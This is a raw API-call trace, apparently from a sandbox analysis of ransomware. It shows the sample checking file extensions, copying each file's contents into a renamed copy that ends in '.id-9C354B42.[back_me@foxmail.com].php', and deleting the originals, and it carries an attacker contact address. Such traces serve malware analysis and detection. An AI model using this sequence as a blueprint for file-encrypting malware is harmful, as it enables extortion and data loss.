(lpString1=".xls", lpString2=".PNG") returned 1 [0047.902] lstrlenW (lpString=".xlsx") returned 5 [0047.902] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.902] lstrlenW (lpString=".ppt") returned 4 [0047.902] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.902] lstrlenW (lpString=".zip") returned 4 [0047.902] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.902] lstrlenW (lpString=".rar") returned 4 [0047.902] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.902] lstrlenW (lpString=".bz2") returned 4 [0047.902] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.902] lstrlenW (lpString=".7z") returned 3 [0047.902] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.902] lstrlenW (lpString=".dbf") returned 4 [0047.902] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.902] lstrlenW (lpString=".1cd") returned 4 [0047.902] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.902] lstrlenW (lpString=".jpg") returned 4 [0047.902] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.902] lstrlenW (lpString=".doc") returned 4 [0047.902] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.902] lstrlenW (lpString=".docx") returned 5 [0047.902] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.902] lstrlenW (lpString=".pdf") returned 4 [0047.903] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.903] lstrlenW (lpString=".xls") returned 4 [0047.903] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.903] lstrlenW (lpString=".xlsx") returned 5 [0047.903] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.903] lstrlenW (lpString=".ppt") returned 4 [0047.903] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.903] lstrlenW (lpString=".zip") returned 4 [0047.903] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.903] lstrlenW (lpString=".rar") returned 4 [0047.903] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.903] lstrlenW (lpString=".bz2") returned 4 [0047.903] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.903] lstrlenW (lpString=".7z") returned 3 [0047.903] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.903] lstrlenW (lpString=".dbf") returned 4 [0047.903] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.903] lstrlenW (lpString=".1cd") returned 4 [0047.903] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0047.903] lstrlenW (lpString=".jpg") returned 4 [0047.903] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.903] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.903] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.903] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.935] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=37112) returned 1 [0047.936] CloseHandle (hObject=0x1b0) returned 1 [0047.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 0x20 [0047.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.936] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.936] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.936] GetLastError () returned 0x0 [0047.936] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x90f8, lpOverlapped=0x0) returned 1 [0048.103] WriteFile (in: hFile=0x214, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x9100, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x9100, lpOverlapped=0x0) returned 1 [0048.106] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.106] WriteFile (in: hFile=0x214, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.106] SetEndOfFile (hFile=0x214) returned 1 [0048.106] CloseHandle (hObject=0x214) returned 1 [0048.106] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.106] SetEndOfFile (hFile=0x1b0) returned 1 [0048.107] CloseHandle (hObject=0x1b0) returned 1 [0048.107] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.107] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 1 [0048.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.108] lstrlenW (lpString=".doc") returned 4 [0048.108] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.108] lstrlenW (lpString=".docx") returned 5 [0048.108] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.108] lstrlenW (lpString=".pdf") returned 4 [0048.108] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.108] lstrlenW (lpString=".xls") returned 4 [0048.108] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.108] lstrlenW (lpString=".xlsx") returned 5 [0048.108] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.108] lstrlenW (lpString=".ppt") returned 4 [0048.108] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.108] lstrlenW (lpString=".zip") returned 4 [0048.108] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.108] lstrlenW (lpString=".rar") returned 4 [0048.108] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.108] lstrlenW (lpString=".bz2") returned 4 [0048.108] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.108] lstrlenW (lpString=".7z") returned 3 [0048.108] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.108] lstrlenW (lpString=".dbf") returned 4 [0048.108] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.108] lstrlenW (lpString=".1cd") returned 4 [0048.108] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.108] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.108] lstrlenW (lpString=".jpg") returned 4 [0048.108] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.109] lstrlenW (lpString=".doc") returned 4 [0048.109] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.109] lstrlenW (lpString=".docx") returned 5 [0048.109] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.109] lstrlenW (lpString=".pdf") returned 4 [0048.109] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.109] lstrlenW (lpString=".xls") returned 4 [0048.109] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.109] lstrlenW (lpString=".xlsx") returned 5 [0048.109] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.109] lstrlenW (lpString=".ppt") returned 4 [0048.109] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.109] lstrlenW (lpString=".zip") returned 4 [0048.109] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.109] lstrlenW (lpString=".rar") returned 4 [0048.109] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.109] lstrlenW (lpString=".bz2") returned 4 [0048.109] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.109] lstrlenW (lpString=".7z") returned 3 [0048.109] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.109] lstrlenW (lpString=".dbf") returned 4 [0048.109] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.109] lstrlenW (lpString=".1cd") returned 4 [0048.109] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0048.109] lstrlenW (lpString=".jpg") returned 4 [0048.109] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.110] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.110] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.110] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.110] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1423) returned 1 [0048.110] CloseHandle (hObject=0x1b0) returned 1 [0048.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 0x20 [0048.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.110] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.110] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.110] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.110] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.118] GetLastError () returned 0x0 [0048.118] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x58f, lpOverlapped=0x0) returned 1 [0048.123] WriteFile (in: hFile=0x214, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x590, lpOverlapped=0x0) returned 1 [0048.124] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.124] WriteFile (in: hFile=0x214, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.124] SetEndOfFile (hFile=0x214) returned 1 [0048.124] CloseHandle (hObject=0x214) returned 1 [0048.124] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.124] SetEndOfFile (hFile=0x1b0) returned 1 [0048.125] CloseHandle (hObject=0x1b0) returned 1 [0048.125] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.125] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 1 [0048.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.126] lstrlenW (lpString=".doc") returned 4 [0048.126] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.126] lstrlenW (lpString=".docx") returned 5 [0048.126] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.126] lstrlenW (lpString=".pdf") returned 4 [0048.126] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.126] lstrlenW (lpString=".xls") returned 4 [0048.126] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.126] lstrlenW (lpString=".xlsx") returned 5 [0048.126] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.126] lstrlenW (lpString=".ppt") returned 4 [0048.126] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.126] lstrlenW (lpString=".zip") returned 4 [0048.126] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.126] lstrlenW (lpString=".rar") returned 4 [0048.126] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.126] lstrlenW (lpString=".bz2") returned 4 [0048.126] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.126] lstrlenW (lpString=".7z") returned 3 [0048.126] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.126] lstrlenW (lpString=".dbf") returned 4 [0048.126] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.126] lstrlenW (lpString=".1cd") returned 4 [0048.126] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.126] lstrlenW (lpString=".jpg") returned 4 [0048.127] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.127] lstrlenW (lpString=".doc") returned 4 [0048.127] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.127] lstrlenW (lpString=".docx") returned 5 [0048.127] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.127] lstrlenW (lpString=".pdf") returned 4 [0048.127] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.127] lstrlenW (lpString=".xls") returned 4 [0048.127] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.127] lstrlenW (lpString=".xlsx") returned 5 [0048.127] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.127] lstrlenW (lpString=".ppt") returned 4 [0048.127] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.127] lstrlenW (lpString=".zip") returned 4 [0048.127] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.127] lstrlenW (lpString=".rar") returned 4 [0048.127] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.127] lstrlenW (lpString=".bz2") returned 4 [0048.127] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.127] lstrlenW (lpString=".7z") returned 3 [0048.127] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.127] lstrlenW (lpString=".dbf") returned 4 [0048.127] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.127] lstrlenW (lpString=".1cd") returned 4 [0048.127] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75 [0048.127] lstrlenW (lpString=".jpg") returned 4 [0048.127] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.140] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=15737) returned 1 [0048.140] CloseHandle (hObject=0x1b0) returned 1 [0048.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 0x20 [0048.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.141] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.141] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.141] GetLastError () returned 0x0 [0048.141] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x3d79, lpOverlapped=0x0) returned 1 [0048.150] WriteFile (in: hFile=0x214, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x3d80, lpOverlapped=0x0) returned 1 [0048.151] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.151] WriteFile (in: hFile=0x214, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.151] SetEndOfFile (hFile=0x214) returned 1 [0048.152] CloseHandle (hObject=0x214) returned 1 [0048.152] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.152] SetEndOfFile (hFile=0x1b0) returned 1 [0048.153] CloseHandle (hObject=0x1b0) returned 1 [0048.153] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.153] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 1 [0048.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0048.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0048.153] lstrlenW (lpString=".doc") returned 4 [0048.153] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.153] lstrlenW (lpString=".docx") returned 5 [0048.153] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.153] lstrlenW (lpString=".pdf") returned 4 [0048.153] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.153] lstrlenW (lpString=".xls") returned 4 [0048.154] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.154] lstrlenW (lpString=".xlsx") returned 5 [0048.154] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.154] lstrlenW (lpString=".ppt") returned 4 [0048.154] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG") returned 76 [0048.154] lstrlenW (lpString=".zip") returned 4 [0048.154] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.154] lstrlenW (lpString=".rar") returned 4 [0048.154] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.154] 